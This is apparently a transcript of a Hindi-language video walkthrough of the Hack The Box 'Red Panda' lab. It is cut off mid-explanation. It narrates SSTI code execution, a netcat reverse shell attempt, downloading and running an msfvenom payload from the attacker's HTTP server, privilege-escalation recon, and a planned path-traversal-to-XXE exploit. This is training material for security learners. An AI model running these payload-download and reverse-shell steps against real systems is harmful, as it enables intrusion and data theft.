अस्सलाम वालेकुम। आज जो है द बॉक्सी मशीन मैं सॉल्व करूंगा, उसका नाम है रेड पांडा, जो कि एक लिनक्स की मशीन है। सबसे पहले स्टार्ट करेंगे nmap स्कैन से। sudo nmap डैश एस सी फॉर डिफ़ॉल्ट स्क्रिप्ट, डैश एस वी फॉर वर्जन इनूमरेशन, डैश एस एस फॉर स्टेल्थ स्कैन। 10.10.11.170 मशीन का आईपी है। डैश ओ nmap की फ़ाइल में करेंगे, और डैश टी फोर आप यूज़ कर सकते हैं तेज़ आउटपुट या क्विकर रिजल्ट हासिल करने के लिए। ये स्कैन मैंने ऑलरेडी रन किया हुआ है, इसका आउटपुट देखेंगे कैट एन मैप की फ़ाइल में। और यहाँ पे हमारे पास दो पोर्ट्स ओपन हैं, पोर्ट नंबर 22 और पोर्ट है 8080। सो पोर्ट 8080 को देखेंगे। यहाँ पे http://10.10.11.170 पोर्ट 8080। ये हमारे पास बेसिक सा इंटरफेस है, अ, जिससे हमें जिसपे हमें एक सर्च बार शो हो रहा है। और इसके अलावा दिस इज़ प्रीटी मच इट। इसके अलावा कोई ऐसा जिसके ऊपर इंफॉर्मेशन नहीं है। सो यहाँ से जो चीज़ें मैंने इसके ऊपर पहले ट्राई की थी, वो सबसे पहले मैंने इसके ऊपर सीक्वल मैप के थ्रू सीक्वल इंजेक्शन की वल्नरेबिलिटी को टेस्ट किया, लेकिन वो यहाँ पे एग्जिस्ट नहीं करती। और इस पे डायरेक्टरी ब्रूट फोर्सिंग भी मैंने परफॉर्म की, लेकिन कोई इंटरेस्टिंग डायरेक्टरीज भी इस वेबसाइट के ऊपर अवेलेबल नहीं हैं। जो ऑप्शन बचता है वो, अगर हम थोड़ी सी nmap स्कैन में गौर करें, तो यहाँ पे हमारे पास ये एच टी टी पी टाइटल शो हो रहा है, रेड पांडा सर्च मेड विद स्प्रिंग बूट। इधर से टेक्नोलॉजी थोड़ी सी फिंगरप्रिंट हो जाती है कि ये वेबसाइट जो है ये स्प्रिंग बूट के ऊपर बनी हुई है। ये यहाँ पे भी शो हो रहा है अगर ये टैब पूरा ओपन हो तो, यानी ये वेबसाइट स्प्रिंग बूट के ऊपर, स्प्रिंग बूट की टेक्नोलॉजी जो कि एक जावा का वेब फ्रेमवर्क है उसके ऊपर बनी हुई है। अगर आप स्प्रिंग बूट को थोड़ा सा स्टडी करें तो आपको इस बारे में पता चलेगा कि इस फ्रेमवर्क के ऊपर सर्वर साइड टेम्पलेट इंजेक्शन काफ़ी ज़्यादा कॉमन है। कहीं पे भी इनपुट फील्ड हो, हम सीक्वल मैप को ट्राई करते हैं। और इसके अलावा सी एस एस टी आई भी हमारे पास एक ऑप्शन होता है। सो एस एस टी आई की वल्नरेबिलिटी को टेस्ट करने के लिए हैक ट्रिक्स ट्राई करेंगे। यहाँ पे अक्सर काफ़ी अच्छी इंफॉर्मेशन होती है रिगार्डिंग पेलोड्स, और जो हमारे पास एक्सप्लॉयटेशन की इंफॉर्मेशन है वो यहाँ पे काफ़ी अच्छे तरीके से हैक ट्रिक्स के ऊपर एक्सप्लेन की गई होती है। यहाँ पे बेसिक टेस्ट जब हमने एस एस टी आई का कभी भी किसी भी वेब एप्लीकेशन पे करना हो, तो हम इस तरह करते हैं कि कोई से दो नंबर्स को मल्टीप्लाई करके एंटर करते हैं और देखते हैं कि क्या हमारे पास आउटपुट आ रहा है। अगर तो उसका फाइनल आउटपुट, फाइनल प्रोडक्ट शो हो रहा है, इट मीन्स के हमने जो भी कोड लिखा यहाँ पे सर्च बार में, वो सर्वर साइड पे एग्जीक्यूट हुआ, विच मीन्स के हमारा इनपुट सर्वर साइड पे प्रोसेस हो रहा है, विच इज़ अ गुड साइन के ये वेब एप्लीकेशन एस एस टी आई के लिए वलनरेबल है। तो इसकी मज़ीद डिटेल्स अगर हमने फर्दर एक्सप्लॉइट करना हो, इससे रिमोट कोड एग्जीक्यूशन लेनी हो, या मज़ीद जितने भी अटैक वेक्टर्स हैं, तो वो हैक ट्रिक्स पे आप देख सकते हैं। स्टार्ट में इसने थोड़ा बहुत डिटेक्शन का बताया हुआ है कि आप किस तरह डिटेक्ट करते हो। जैसे मैंने 7 × 7 किया तो हमारे पास 49 आउटपुट आया। आप कोई और नंबर भी ले सकते हैं। इस तरह ये डिफरेंट कर्ली ब्रेसेस हैं, डॉलर डॉलर का साइन है, हैश है, स्टैरिक है। ये डिफरेंट तरीके हैं जिनसे आप टेस्ट कर सकते हो एस एस टी आई को सर्वर के ऊपर। यहाँ पे हमारे पास हम स्प्रिंग फ्रेमवर्क का पेलोड देखेंगे। अच्छा, इसके ऊपर मैंने काफ़ी ज़्यादा टेस्टिंग की थी, डिफरेंट मैनुअली एक्सप्लॉइट करने के लिए डिफरेंट पेलोड्स ट्राई किए थे, और उस पर अच्छा खासा टाइम लगा था। वो अगर आप करना चाहें तो खुद से कर सकते हैं उसको भी ट्राई। सो यहाँ पे अगर मैं इसको एग्जीक्यूट करूँ इस कमांड को, तो ये रन टाइम के ऊपर रन टाइम गेट करके उसके ऊपर एग्जीक्यूट कर रहा है आईडी की कमांड को, और फिर इनपुट स्ट्रीम जो भी आउटपुट आ रहा है उसको हमें शो करेगा। यहाँ पे आईडी की कमांड एग्जीक्यूट हो गई इस सर्वर के ऊपर, विच मीन्स कि हम कोड एग्जीक्यूट कर सकते हैं बैकएंड सर्वर के ऊपर। अब हमारा टारगेट ये होगा कि हम अब चूंकि हमारे पास रीडिंग की एबिलिटी आ गई है, हम एलएस भी कर सकते हैं।
ls-la। तो इसका मतलब है कि हम कोई फाइल्स भी रीड कर सकते हैं, और कैट अगर हम किसी फाइल को करें तो हम उसको देख सकते हैं, उसके कंटेंट को। यूज़र फ्लैग हम यहाँ से ले सकते हैं, लेकिन बेहतर अप्रोच ये होगी कि हम रिवर्स शेल पहले ले लें, और जब हमारे पास एक रिवर्स शेल सेशन आ जाए, क्योंकि प्रिविलेज एस्केलेशन परफॉर्म करने के लिए हमें इन एनी केस रिवर्स शेल तो चाहिए ही। तो इसके लिए हम अ, सबसे पहले जो मैंने कोशिश की थी यहाँ पे, वो ये कि इसी कमांड को यूज़ करते हुए यहाँ पे मैं बैश -c या नेटकैट -c, नेटकैट आगे आईपी और पोर्ट दे के, लाइक 123 है आईपी फॉर एग्जांपल, एंड समथिंग दिस इज पोर्ट, एंड -e इज bin/bash। सो इस तरह की कमांड दे के यहाँ पे रिवर्स शेल एग्जीक्यूट नहीं हो रहा था फॉर सम रीज़न। उसका मुझे आइडिया नहीं है कि उसका रीज़न क्या है, क्यों यहाँ से डायरेक्टली एग्जीक्यूट नहीं हो रहा था। अगर आपको इस चीज़ का आइडिया है तो ज़रूर मेरे से शेयर करें कमेंट सेक्शन में। दूसरा ऑप्शन जो हमारे पास यहाँ पे बचता है, वो ये कि हम मैनुअली पेलोड बनाएं अपने पास फाइल को, और पाइथन सर्वर पे होस्ट करके उसे यहाँ पे पहले डाउनलोड करें और फिर उसको इधर से एग्जीक्यूट करें। सो उसके लिए एम एस एफ वैनम का पेलोड मैंने सेव किया हुआ है अपने पास, कैट पेलोड डॉट टी एक्स टी। इस कमांड को एग्जीक्यूट करके एम एस एफ वैनम के थ्रू हम पेलोड जनरेट करेंगे। सो जब तक ये एग्जीक्यूट होता है, हम पाइथन सर्वर सेटअप कर लेते हैं, पाइथन 3 -m http डॉट सर्वर। ओके, सो ये थोड़ा सा टाइम ले रहा है। ओके, सो हमारे पास पेलोड जो है वो एक जनरेट हो चुका है। अब इसको हम सेंड करेंगे अपने सर्वर के ऊपर, यहाँ वहाँ से डुप्लिकेट करेंगे इसे, http:/10.10.14.13, 8000 पोर्ट है, /payload.elf। इसको एंटर करेंगे, और यहाँ पे हमारे पास हिट आई है, लेकिन payload.elf is the file which is not found। हमारे पास फाइल तो एग्जिस्ट करती है, देन देखते हैं कि वहाँ पे ये चीज़, ये फाइल आई है कि नहीं। ओके, सो अच्छा, बेसिकली गलती जो मैं कर रहा हूँ वो ये कि इस डायरेक्टरी के अंदर पाइथन सर्वर नहीं चल रहा। सो सी डी डॉक्यूमेंट्स रेड पांडा, अब इसे चलना चाहिए और चलेगा। इट इज़ हेयर, फाइल इज़ फाउंड। ओके, अब यहाँ से हम फाइल को चेक कर लेते हैं कि हमारे पास आई है कि नहीं।
payload.elf, इसको बनाएंगे एग्जीक्यूटेबल, change mode plus x payload.elf, और इसको एग्जीक्यूट करने से पहले हम netcat listener सेटअप कर लें, netcat -nlvp 1111। ओके, सो हम इस फाइल को एग्जीक्यूट करेंगे ./payload.elf। जी, तो हमारे पास कनेक्शन है। who am I, Woodank। शेल को स्टेबलाइज कर लेंगे, -c import pty/bin/bash। ओके, export term is equal to xterm, control z, stty raw echo fg। ओके, सो अब हमारे पास यूज़र है। present working directory is this cd/cd home ls cd woodank ls, और ये रहा हमारे पास फ्लैग जिसको हम रीड कर सकते हैं। ओके, नेक्स्ट, अब यहाँ पे प्रिविलेज एस्केलेशन परफॉर्म करनी है, और उसके लिए काफ़ी डिफरेंट वेज हैं। linpis आप यहाँ पे एग्जीक्यूट करो, उसका आउटपुट एग्जामिन करो, और सारी वो चीज़ें मैंने इस पे की हैं ऑब्वियसली, लेकिन मैं सोल्यूशन के ऊपर जंप अप करूँगा टू मेक दिस वीडियो शॉर्टर और टाइम बचाने के लिए। अच्छा, तो जो यहाँ पे एक चीज़ थी वो ये कि सबसे पहले हम एनालाइज करें कि हम किस ये यूज़र किस किस ग्रुप्स का हिस्सा है। तो अगर हम देखें तो हमारे पास लॉग्स जो हैं, वुडन का अपना अपने ग्रुप का हिस्सा है और लॉग्स ग्रुप का भी हिस्सा है। और अगर हम देखना चाहें कि ये कौन कौन सी फाइल्स हैं जो इस ग्रुप को बिलोंग करती हैं, सो उसकी कमांड में भी ये है logs। ओके, ग्रुप, मुझे डेवनल का, ओके, opt रेड पांडा सर्च रेड पांडा लॉग, ओके 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 ओके, सबसे टॉप पे हमें शो हुई थी। ये परमिशन डिनाइड है, मुझे उसे डेवनल में रिडायरेक्ट करना चाहिए था। ओके, सो यहाँ पे ये फाइल जो सबसे पहली फाइल हमें शो हुई है opt पांडा सर्च रेड पांडा लॉग, यानी कि हम ये इस लॉग्स के ग्रुप को बिलोंग करती है, यानी कि हम इस फाइल को एडिट कर सकते हैं। सो इसको जाके देखेंगे cd opt पांडा सर्च ls रेड पांडा लॉग। So this file is currently empty। ओके, इसमें हमें राइट की एक्सेस है ड्यू टू लॉग्स ग्रुप, अगर आप यहाँ पे देखें तो। सो इसके बाद हम देखेंगे कि एज रूट इसके ऊपर कौन कौन सी, देखें प्रिविलेज एस्केलेशन में बहुत सी चीज़ें ट्राई होती हैं, और जब आप रन टाइम पे एक बॉक्स कर रहे होते हो तो आप बहुत सी डिफरेंट चीज़ें ट्राई करते हो, लेकिन वो सारी चीज़ें अभी मैं इस वीडियो में नहीं करके दिखा सकता वरना वीडियो बहुत ज़्यादा लेंथी होगी। सो इस वीडियो में मैं एग्जैक्टली वही चीज़ें कर रहा हूँ जो कि मुझे सोल्यूशन की तरफ लेके गई थी। सो इसके बाद हम जो प्रिविलेज एस्केलेशन में एक चीज़ एनालाइज करते हैं वो है पे ये प्रोसेसेस देखें कि एज रूट कौन कौन से प्रोसेसेस चल रहे हैं, और इस चीज़ इस प्रोसेस के दौरान मुझे एक चीज़ इंटरेस्टिंग पता चली कि पीएस ऑक्स के थ्रू अगर आप देखें तो हो सकता है फॉर सम रीज़न आपको तमाम जो प्रोसेसेस हैं जो एज अ रूट चल रहे हैं वो ना मिलें, और इसका रीज़न मुझे नहीं पता।
इसका रीज़न भी अगर आप लोगों को पता चलता है तो मुझे ज़रूर बताएं। इसके लिए एक टूल यूज़ होती है PSPY64 के नाम से, जो कि रूट एज अ रूट जो प्रोसेसेस चल रहे हैं उसको एनालाइज करती है। सो उसको क्विकली डाउनलोड कर लेंगे। ओके, सो इसको यहाँ पे मूव करेंगे, python 3 -m http डॉट सर्वर, और इस फाइल को यहाँ पे फेच करेंगे 10.10.14.13 8000, और हमारे पास फाइल का नाम है PSPY64। कैन नॉट राइट टू पी, अच्छा इस डायरेक्टरी के अंदर हम राइट नहीं कर सकते, सो हम टेम्प की डायरेक्टरी में जाएंगे और वहाँ पे ये कमांड एग्जीक्यूट करेंगे। अच्छा, तो ये मेरे पास PSPY का आउटपुट आ चुका है, और हमारे पास अगर हम इस आउटपुट को एनालाइज करें तो हमारा मकसद स्टार्ट में ये था कि हम रूट के प्रोसेसेस देखें कि एज अ रूट कौन कौन से प्रोसेसेस चल रहे हैं। सो यहाँ पे UID 0 के साथ ये एक प्रोसेस चल रहा है जिसमें जावा की फ़ाइल एग्जीक्यूट हो रही है एज रूट, और जो कि हमारे पास पड़ा हुआ है क्रेडिट स्कोर की डायरेक्टरी के अंदर, और ये वाला प्रोसेस हमें PS ऑक्स के थ्रू विजिबल नहीं था। सो अगेन अ मिस्ट्री। एनीवेज, इस फाइल को हम एनालाइज करेंगे कि ये जो फाइल एग्जीक्यूट हो रही है किस किस्म की फ़ाइल है। उसके लिए हमारे पास अ, दो ऑप्शंस हैं। एक ये कि हम जार फाइल को लोकली एक डाउनलोड करके उसे JDGI से देखें, या हम इसी डायरेक्टरी के अंदर इसका सोर्स कोड भी पड़ा होता है उसको एनालाइज करें। सो यहाँ पे हमारे पास CD log parser है। CD final। अच्छा, अब यहाँ पे टारगेट के अंदर, जैसे कि यहाँ PSPY के आउटपुट के अंदर टारगेट के अंदर जो है वो बाइनरी पड़ी हुई है जावा की, लेकिन टारगेट डायरेक्टरी के अंदर जैसे बाइनरी पड़ी होती है वैसे ही उसी फोल्डर में उसी रूट लेवल यानी इस डायरेक्टरी लेवल के ऊपर सोर्स फोल्डर के अंदर उस बाइनरी का सोर्स कोड पड़ा होता है। सो ये हमारे लिए बेहतर है कि हम यहीं पे एनालाइज कर लें, बजाय इसके कि लोकली डाउनलोड करें फिर उसे JDGI के थ्रू ओपन करें। ये अप्रोच मुझे ज़्यादा बेहतर लगती है, बजाय इसके कि लोकली उस फाइल को फेच किया जाए। कुछ डायरेक्टरीज डीप हमें जाना पड़ता है, लेकिन नो प्रॉब्लम। ओके, लॉग पार्सर। ऐप डॉट जावा। अच्छा, अब यहाँ पे हमारे पास ऐप डॉट जावा की फ़ाइल है, इसे देखेंगे कि इसमें किस किस्म का कोड है। सो ये हमारे पास यहाँ पे कोड आ गया। सो यहाँ पे अगर हम ये मेन फंक्शन को देखें तो रेड पांडा डॉट लॉग की फ़ाइल जो है वो ओपन हो रही है और उसके ऊपर थोड़ी प्रोसेसिंग हो रही है। सो रेड पांडा डॉट लॉग की फ़ाइल हमने देखी थी कि उसके अंदर हमें राइट परमिशंस हैं। सो पहले तो ये पाथ कॉपी कर लेते हैं ताकि इसकी दोबारा हमें ज़रूरत पड़े तो वो सारे प्रोसेस से ना हमें गुजरना पड़े CD के। ठीक है। सो रेड पांडा डॉट लॉग के अंदर हमें राइट परमिशंस हैं। बेसिकली ये जावा की फ़ाइल क्या कर रही है कि रेड पांडा डॉट लॉग के अंदर हर रिक्वेस्ट का लॉग स्टोर होता है।
इट्स लाइक एच टी टी पी रिक्वेस्ट जो भी आएगी उसका लॉग जो है वो रेड पांडा डॉट लॉग की फाइल के अंदर स्टोर होगा। सो जैसे ही ये चीज़ होती है तो हमारे पास क्या होता है कि ये फाइल ये कोड एग्जीक्यूट हो रहा है जो कि इस फाइल को ओपन करता है। उसके बाद ये थोड़ी सी जावा का कोड है जिसमें ये फाइल को रीड कर रहा है, और उसके अंदर फिर जब हर लाइन को रीड करता है जो कि लॉग की फाइल के अंदर है, और जैसे ही वो देखता है कि कोई भी लाइन है उसके ऊपर जो है इफ़ इस इमेज की फंक्शन कॉल हो रही है, सो उसको वो लाइन पास कर रहा है। सो इस इमेज का फंक्शन ये कर रहा है कि वो जैसे फंक्शन के नाम से पढ़ के पता चल रहा है, तो वो चेक करता है कि ये फाइल जो है वो एक इमेज है या नहीं। और वो कैसे चेक करता है, यहाँ पे अगर आप देखें तो वो सिंपली ये देख रहा है कि जो फाइल नेम है उसके अंदर डॉट जेपैग की एक्सटेंशन है या नहीं। अगर डॉट जेपैग है इट मीन्स कि वो फाइल है, फोटो है या इमेज है। अदरवाइज वो इसको इमेज कंसिडर नहीं करता, यानी डॉट पीएनजी को भी वो इमेज कंसिडर नहीं करेगा। सो यहाँ पे अगर वो इमेज है तो उसे वो कंटिन्यू करेगा। और यहाँ पे अगर हम देखें तो मज़ीद कुछ फंक्शन कॉल्स हैं। यहाँ पे पार्स लॉग वो लाइन जो है पार्स लॉग के फंक्शन को पास हो रही है। अगर हम पार्स लॉग का फंक्शन देखें तो अ, यहाँ पे ये रहा। सो यहाँ पे अगर हम पार्स लॉग का फंक्शन देखें तो वो क्या कर रहा है कि हर लाइन को स्प्लिट कर रहा है जो पाइप्स हैं उसकी बेस पे। मैं आपको पहले एक दफ़ा दिखा देता हूँ कि पहले इस कोड को कॉपी कर लेते हैं। मैं आपको पहले एक दफ़ा दिखा देता हूँ कि कैसे वो लॉग की फ़ाइल जो है उसमें एंट्री कैसे होती है हर रिक्वेस्ट की। तो फिर हमारे लिए थोड़ा आसान हो जाएगा इस कोड को समझना। और अपेरेंटली मैं इसे कॉपी करने की कोशिश कर रहा हूँ लेकिन इट्स टू स्लो। ओके। okay. माशाल्लाह। खैर, अ, मेरी कॉपी पेस्ट की स्किल्स इतनी बुरी नहीं है, लेकिन कुछ गड़बड़ है यहाँ पे। एनीवेज कोड हमारे पास आ गया है, और अब हम ज़रा देख लें कि जो रेड पांडा की फ़ाइल है रेड पांडा डॉट लॉग की, उसके अंदर लॉग्स कैसे स्टोर होते हैं। और सी डी स्लैश ओ पी डी पांडा सर्च। सो यहाँ पे हमारे पास रेड पांडा डॉट लॉग की फ़ाइल है, रेड पांडा डॉट लॉग। ये फ़िलहाल एम्प्टी है, लेकिन अगर हम यहाँ पे जाके कुछ सर्च करते हैं, फॉर एग्ज़ाम्पल ABC, हम यहाँ पे सर्च करते हैं और फिर इस फाइल को देखते हैं कि इसमें कोई एंट्री है कि नहीं। सो यहाँ पे कुछ एंट्रीज आई हैं जो कि पाइप से सेपरेटेड हैं। लाइक पहले स्टेटस कोड है, फिर आईपी है, फिर यूज़र एजेंट है, और फिर वो डायरेक्टरी है जो कि रिक्वेस्ट की गई है HTTP रिक्वेस्ट में। सो इस तरह जो है रेड पांडा डॉट लॉग फाइल जो है वो अपडेट होती है जैसे ही कोई भी रिक्वेस्ट जनरेट होती है। सो अब ज़रा सोर्स कोड को देख लेते हैं। सो यहाँ पे
यहाँ पे अगर हम देखें तो जो पार्स लॉक की है फंक्शन, वो हर लाइन को स्प्लिट कर रहा है पाइप्स की बेस पे। और स्टेटस कोड को वो ऐड कर रहा है। सबसे पहले स्टेटस कोड है वो मैप के अंदर, मैप इज समथिंग लाइक लिस्ट, उसके अंदर स्टेटस कोड को ऐड कर रहा है, आईपी को ऐड कर रहा है, यूज़र एजेंट को ऐड कर रहा है और यूआरआई को ऐड कर रहा है उनकी कीज़ के साथ, ताकि अगर फेच करना हो तो आराम से की वैल्यू पेयर की बेस के ऊपर इसे फेच किया जा सके इन वैल्यूज़ को। सो यहाँ पे हमारे पास मैप पार्स्ड डाटा के अंदर ये मैप का वेरिएबल आ जाएगा, वो वैल्यूज़ आ जाएंगी जो कि ये पार्स लॉग रिटर्न कर रहा है। उसके बाद सिस्टम डॉट ऑर्डर प्रिंट लेना है, इसको इग्नोर करें। सिस्टम आर्टिस्ट में क्या कर रहा है कि गेट आर्टिस्ट स्ट्रिंग आर्टिस्ट एक वेरिएबल बनाया और उसके अंदर गेट आर्टिस्ट का फंक्शन कॉल किया और उसे क्या पास किया, पार्स डाटा डॉट गेट यूआरआई। यानी कि जो यूआरआई है जो के लॉग में स्टोर हुई है, अब तो हमारे पास की वैल्यू पेयर की बेस में की फॉर्म में मौजूद है, तो उसको पास कर रहा है गेट आर्टिस्ट को। अब गेट आर्टिस्ट का फंक्शन देख लेते हैं कि वो क्या कर रहा है। सो यहाँ पे अगर हम देखें तो यहाँ पे हमारे पास यूआरआई आ रही है। और यूआरआई क्या है, यूआरआई बेसिकली ये है, ये चीज़ है, ये यूआरआई है। इसी के अंदर वो चेक करता है कि डॉट जेपैग एग्जिस्ट करता है कि नहीं एग्जिस्ट करता। अगर एग्जिस्ट करता है तो वो फर्दर फिर उसको एनालाइज करता है, अदरवाइज नहीं करता। डॉट जेपैग का मतलब ये है कि कोई इमेज फाइल ओपन हुई है। सो यहाँ पे जैसे ही हमारे पास डॉट जेपैग आएगी तो यहाँ से अब वो गेट आर्टिस्ट फेच करेगा। गेट आर्टिस्ट क्या है कि जो इमेज है उसके अंदर कुछ मेटा डाटा होता है, और उस मेटा डाटा में हर इमेज का एग्जिफ टूल यूज़ होती है इस मेटा डाटा को फेच करने के लिए या सेट करने के लिए। सो इमेज के ऊपर जो आर्टिस्ट की वैल्यू सेट है उसको ये फेच कर रहा है। कैसे कर रहा है देखें कि यहाँ पे इस डायरेक्टरी के अंदर पड़ी हुई हैं कुछ इमेजेस इस डायरेक्टरी के अंदर इमेजेस पड़ी हुई हैं, और उसके साथ यूआरआई यानी कि उस इमेज का नेम, लाइक फॉर एग्जांपल स्लैश फाइल वन डॉट जेपैग कंकेटनेट होगा। और उसके बाद वो फाइल ओपन हो रही है। फाइल ओपन होने के बाद यहाँ पे वो आर्टिस्ट, ये मेटा डाटा की कुछ लाइब्रेरीज हैं जो कि जावा में मौजूद हैं, उसको यूज़ करते हुए आर्टिस्ट की वैल्यू फेच कर रहा है और रिटर्न कर रहा है कि वो आर्टिस्ट है क्या, जो भी उस इमेज के ऊपर सेट है। अदरवाइज वो नॉट एप्लीकेबल रिटर्न कर देता है। सो यहाँ पे हमारे पास इसके अंदर आर्टिस्ट आ जाता है और उसके बाद उसको वो स्टैंडर्ड आउटपुट पे प्रिंट कर रहा है। उसके बाद हमारे पास स्ट्रिंग एक्सएमएल पाथ इज इक्वल टू स्लैश क्रेडिट स्लैश आर्टिस्ट की वैल्यू जो वहाँ से फेच की थी उसको कंकेटनेट कर रहा है अंडरस्कोर क्रेडिट्स डॉट एक्सएमएल के साथ। और जहाँ पे भी सीटीएफ में हमारे पास कभी भी एक्सएमएल आ जाए तो ये एक अच्छी इंडिकेशन होती है एक्स एक्स ई को टेस्ट करने के लिए, एक्सटर्नल एंटिटी इंजेक्शंस को। सो यहाँ पे अब ये हो क्या रहा है बेसिकली, ये सारा प्रोसेस है क्या इस वेब एप्लीकेशन को अगर आप एनालाइज करें ना, तो इधर फॉर एग्जांपल मैं लिखता हूँ ए। सो मेरे पास कुछ ये इमेजेस आ गई हैं जो कि लोड होने में काफ़ी टाइम ले रही हैं। ओपन वीपीएन के साथ अक्सर काफ़ी स्लो हो जाता है हैक द बॉक्स, पता नहीं क्या इसमें इशू है। एनीवेज यहाँ पे ये इमेजेस हैं कुछ। अगर हम इसको ऑथर को ओपन करें, सो यहाँ पे हर इमेज के अगेंस्ट हमारे पास व्यूज़ हैं। लाइक ये एक स्लैश इमेज स्लैश ग्रेग डॉट जेपैग एक इमेज है। सो अब होगा क्या कि जैसे ही मैं इस इमेज को ओपन करूंगा तो वो इस इमेज का मेटा डाटा फेच करेगा, उसमें से आर्टिस्ट निकालेगा। आर्टिस्ट प्रॉबेबली वुडन होगा और वो वुडन के अंदर ना इसका इंक्रीमेंट कर देगा इसकी वैल्यू जो भी इमेज की होगी। और इस तरह जो है ये व्यूज़ को मेंटेन रखता है कि जो भी इमेज ओपन हो रही है उसका
उसके जो जो व्यूज़ हैं वो किस तरह अपडेट हो रहे हैं और कितने व्यूज़ हैं। सो ये प्रॉबेबली अभी फ़ौरन से अपडेट नहीं हुआ। उसका रीज़न ये है कि वो पहले रेड पांडा लॉग के अंदर वैल्यू जाती है, फिर वो उधर से उसे फेच करता है और उसके ऊपर प्रोसेसिंग करता है, फिर थोड़ी देर बाद ये पांडा व्यूज़ जो है अपडेट हो जाते हैं। सो इस तरह ये प्रॉबेबली प्रोसेस इस तरह कुछ इन्होंने करने की कोशिश की हुई है। यहाँ पे भी यही हो रहा है, जो भी इमेज है आती है उसमें से आर्टिस्ट फेच करता है। आर्टिस्ट फेच करने के मकसद ये है कि उस आर्टिस्ट की जो भी एक्सएमएल फाइल है उसके अंदर इंक्रीमेंट कर दो उस इमेज के व्यूज़ को। सो कोई भी इमेज आई, उसको सबसे पहले उन्होंने चेक किया कि डॉट जेपीईजी है कि नहीं। अगर है तो मेटा डाटा में से ऑथर को फेच किया, आर्टिस्ट को फेच किया। आर्टिस्ट फेच करने के बाद उन्होंने उसको कंकेटनेट किया इस डायरेक्टरी के साथ, यानी इधर क्रेडिट्स के अंदर इसकी एक्सएमएल फाइल कोई पड़ी हुई है, और फिर उस एक्सएमएल फाइल को ऐड व्यू टू एक्सएमएल पाथ के अंदर सेंड करें, यानी कि वो एक्सएमएल फाइल फिर ओपन होती है और फिर ऐड व्यू टू, अगर आप इस कोड को देखें तो यहाँ पे वो सारा इंक्रीमेंट करता है उस कोड को। सो यहाँ पे अब बेसिकली एक्सएमएल की वल्नरेबिलिटी ही है। वो किस तरह कि एक्सएमएल की फाइल यहाँ पे ओपन हो रही है, अगर हम किसी तरह अपनी एक इमेज ऐड कर दें विद मॉडिफाइड आर्टिस्ट, तो हम अपनी एक एक्सएमएल फाइल ओपन करवा सकते हैं एक्सटर्नल एंटिटी इंजेक्शन, जिससे हम एक्सप्लॉइट करेंगे और उससे हमें रूट की सच की या आप कोई भी फिर फाइल चाहें तो ले सकते हैं। तो इसको जल्दी से करके देखते हैं कि ये कैसे होता है। सबसे पहले हमें एक इमेज चाहिए होगी जिसको हमने अपलोड करना है सर्वर के ऊपर। इमेज चाहिए होगी और हमें एक एक्सएमएल फाइल चाहिए होगी, क्योंकि इमेज ओपन होगी उसमें से आर्टिस्ट फेच होगा और उस आर्टिस्ट के नाम की बेस पे उस रेलेवेंट जो भी एक्सएमएल फाइल है उसके अंदर इंक्रीमेंट होगा। सो वो हमने अपनी मलिशियस एक्सएमएल फाइल को ओपन करवाना है किसी तरह इस प्रोसेस से। सो सबसे पहले यहाँ पे हम जाके देख लें इधर जो एक्सएमएल फाइल्स हैं वो किस किस्म की हैं। सी डी क्रेडिट्स। सो ये हमारे पास दो एक्सएमएल फाइल्स हैं, वही जो हमने वुडेनक जो ऑथर था जो उधर वेबसाइट के ऊपर हमने देखा था, वहाँ पे भी ये इस किस्म का अ, था एक ऑथर। सो ये उसकी एक्सएमएल फाइल है जिसके अंदर व्यूज़ मेंटेन होते हैं इमेजेस के। सो यहाँ पे फॉर सम रीज़न वो इमेज देखने की वजह से पता नहीं यहाँ पे इंक्रीमेंट नहीं हुआ, लेकिन एनीवेज इसी तरह ये प्रोसेस चलता है। सो दैट्स हाउ the basic structure of XML file looks like in these two files. So अब हमने करना ये है कि हमने इमेज अपलोड करनी है और अपनी एक XML फाइल जनरेट करनी है। सो यहाँ पे अगर हम देखें तो हमें राइट परमिशंस नहीं है, सिर्फ लॉग्स के ग्रुप में होने की वजह से सिर्फ हमें रीड परमिशंस है, तो हम इधर कोई भी फाइल राइट नहीं कर सकते। तो अब हम कैसे जो है एक्सएमएल फाइल एक मलिशियस बनाएं। सो उसका एक बड़ा मज़े का तरीका ये है कि यहाँ पे अगर आप देखें तो आर्टिस्ट के ऊपर कोई भी इनपुट सैनिटाइजेशन नहीं है। सो यहाँ पे आर्टिस्ट जैसे उस इमेज के अंदर सेट है वैसे ही यहाँ पे प्लेस कर दिया गया। तो अगर हम आर्टिस्ट की वैल्यू को कुछ इस तरह कर दें डॉट डॉट स्लैश, डॉट डॉट स्लैश जब हम इस वैल्यू के अंदर रखेंगे तो इट मीन्स कि वो क्रेडिट से बाहर आ जाएगा। और डॉट डॉट स्लैश के बाद हम टेम्प और स्लैश इस तरह की वैल्यू अगर रखते हैं और आगे ऑथर का कोई भी नाम दे देते हैं, तो ये कुछ पाथ कुछ इस तरह बनेगा स्लैश क्रेडिट स्लैश डॉट डॉट स्लैश टेम्प स्लैश नजम अंडरस्कोर क्रेडिट्स डॉट एक्सएमएल। सो इस डॉट डॉट की वजह से ये डायरेक्टरी ट्रेवर्सल की एग्जांपल है कि हम इस क्रेडिट्स की डायरेक्टरी से बाहर आ जाएंगे और टेम्प के अंदर हम टेम्प के अंदर ऑब्वियसली हम एक फ़ाइल बना सकते हैं। तो हम बेसिकली टेम्प की डायरेक्टरी में एक एक्सएमएल फाइल बनाएंगे और फिर उसको हम अपने एक मलिशियस इमेज के थ्रू एक्सप्लॉइट कर सकते हैं। अब सवाल ये पैदा होता है कि इमेज के अंदर हम ये वैल्यू तो सेट कर देंगे, तो इमेज हमने कैसे अपलोड करनी है सर्वर के ऊपर और उसको कैसे एक्सेस करेंगे। अगर आप यहाँ पे देखें तो जो इमेज है वो इस डायरेक्टरी के अंदर होना ज़रूरी है, लेकिन अगेन इस डायरेक्टरी के अंदर हमें राइट परमिशंस नहीं है, हम इसके अंदर इमेज नहीं ऐड कर सकते। अब इसका क्या सोल्यूशन है? इसका सोल्यूशन भी यही है कि हम जो यूआरआई है उसके अंदर
